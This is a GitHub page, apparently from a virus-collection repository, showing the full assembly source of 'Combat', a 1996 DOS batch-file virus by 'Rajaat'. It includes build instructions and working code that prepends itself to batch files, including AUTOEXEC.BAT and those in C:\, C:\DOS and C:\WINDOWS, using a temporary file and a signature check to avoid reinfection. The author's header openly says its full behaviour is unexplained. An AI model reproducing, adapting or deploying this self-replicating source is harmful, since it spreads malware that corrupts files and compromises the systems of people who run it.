forked from guitmz/virii
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCOMBAT.ASM
executable file
·142 lines (132 loc) · 4.7 KB
/
COMBAT.ASM
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
;=====( Combat virus by Rajaat )===============================================
;
; Non-resident BAT infector, doesn't use external programs by third party.
;
;==============================================================================
;
; Virus name : Combat
; Author : Rajaat
; Origin : United Kingdom, July 1996
; Compiling : Using TASM
;
; TASM /M COMBAT
; TLINK /T COMBAT
; REN COMBAT.COM COMBAT.BAT
; Targets : BAT files
; Size : Doesn't matter
; Resident : No
; Polymorphic : No
; Encrypted : No
; Stealth : No
; Tunneling : No
; Retrovirus : No
; Antiheuristics: No
; Peculiarities : It infects BAT files parasitically
; Drawbacks : It's a goddamn BAT infector, what do you think?!?
; Behaviour : No really, find out yourself! I was bored and made this,
; do you really think I'd spend time explaining what it DOES?
; It's unknown what this virus might do besides replicate :)
;==============================================================================
;
; Results with antivirus software
;
; TBFILE - Not tested
; TBSCAN - Not tested
; TBMEM - Not tested
; TBCLEAN - Not tested
; SVS - Not tested
; SSC - Not tested
; F-PROT - Not tested
; F-PROT /ANALYSE - Not tested
; F-PROT /ANALYSE /PARANOID - Not tested
; AVP - Not tested
; VSAFE - Not tested
; NEMESIS - Not tested
;
;==============================================================================
.model tiny
.code
.radix 16
signature equ 5240
org 100
main:
db '@REM ',0ff
jmp com_entry
db ' * ComBat *'
db 0dh,0ah
db '@echo off',0dh,0ah
db 'goto ComBat',0dh,0ah
com_entry: mov si,80
cmp byte ptr ds:[si],0
je no_check
cld
find_argument: inc si
lodsb
dec si
cmp al,20
je find_argument
mov dx,si
find_end: lodsb
cmp al,0dh
jne find_end
mov byte ptr ds:[si-1],0
push dx
mov ax,3d02
int 21
jc no_check
xchg ax,bx
lea dx,virus_end
mov ah,3f
mov cx,3
int 21
mov ah,3e
int 21
pop dx
cmp word ptr virus_end,signature
je no_check
mov ax,4301
xor cx,cx
int 21
mov ah,3c
xor cx,cx
lea dx,temp_file
int 21
jc no_check
xchg ax,bx
mov ah,40
lea dx,main
mov cx,file_length
int 21
mov ah,3e
int 21
mov ax,4c00
int 21
db 0,'Rajaat / Genesis',0
no_check: mov ax,4c01
int 21
temp_file db 'ComBat.TMP',0
batch_2 db 0dh,0ah
db ':ComBat',0dh,0ah
db 'if #%_tmp%#==## goto no_call',0dh,0ah
db 'C:\ComBat.COM %1',0dh,0ah
db 'if errorlevel 1 goto done_ComBat',0dh,0ah
db 'type %1 >> ComBat.TMP',0dh,0ah
db 'echo. >> ComBat.TMP',0dh,0ah
db 'echo :done_ComBat >> ComBat.TMP',0dh,0ah
db 'copy ComBat.TMP %1 > nul',0dh,0ah
db 'del ComBat.TMP > nul',0dh,0ah
db 'goto done_ComBat',0dh,0ah
db ':no_call',0dh,0ah
db 'set _tmp=%0',0dh,0ah
db 'if #%_tmp%#==## set _tmp=AUTOEXEC.BAT',0dh,0ah
db 'if not exist %_tmp% set _tmp=%0.BAT',0dh,0ah
db 'if not exist %_tmp% goto path_error',0dh,0ah
db 'copy %_tmp% C:\ComBat.COM > nul',0dh,0ah
db 'for %%f in (*.bat c:\*.bat c:\dos\*.bat c:\windows\*.bat ..\*.bat) do call %_tmp% %%f',0dh,0ah
db 'del C:\ComBat.COM > nul',0dh,0ah
db ':path_error',0dh,0ah
db 'set _tmp=',0dh,0ah
file_length equ $-main
virus_end equ $
db ':done_ComBat',0dh,0ah
end main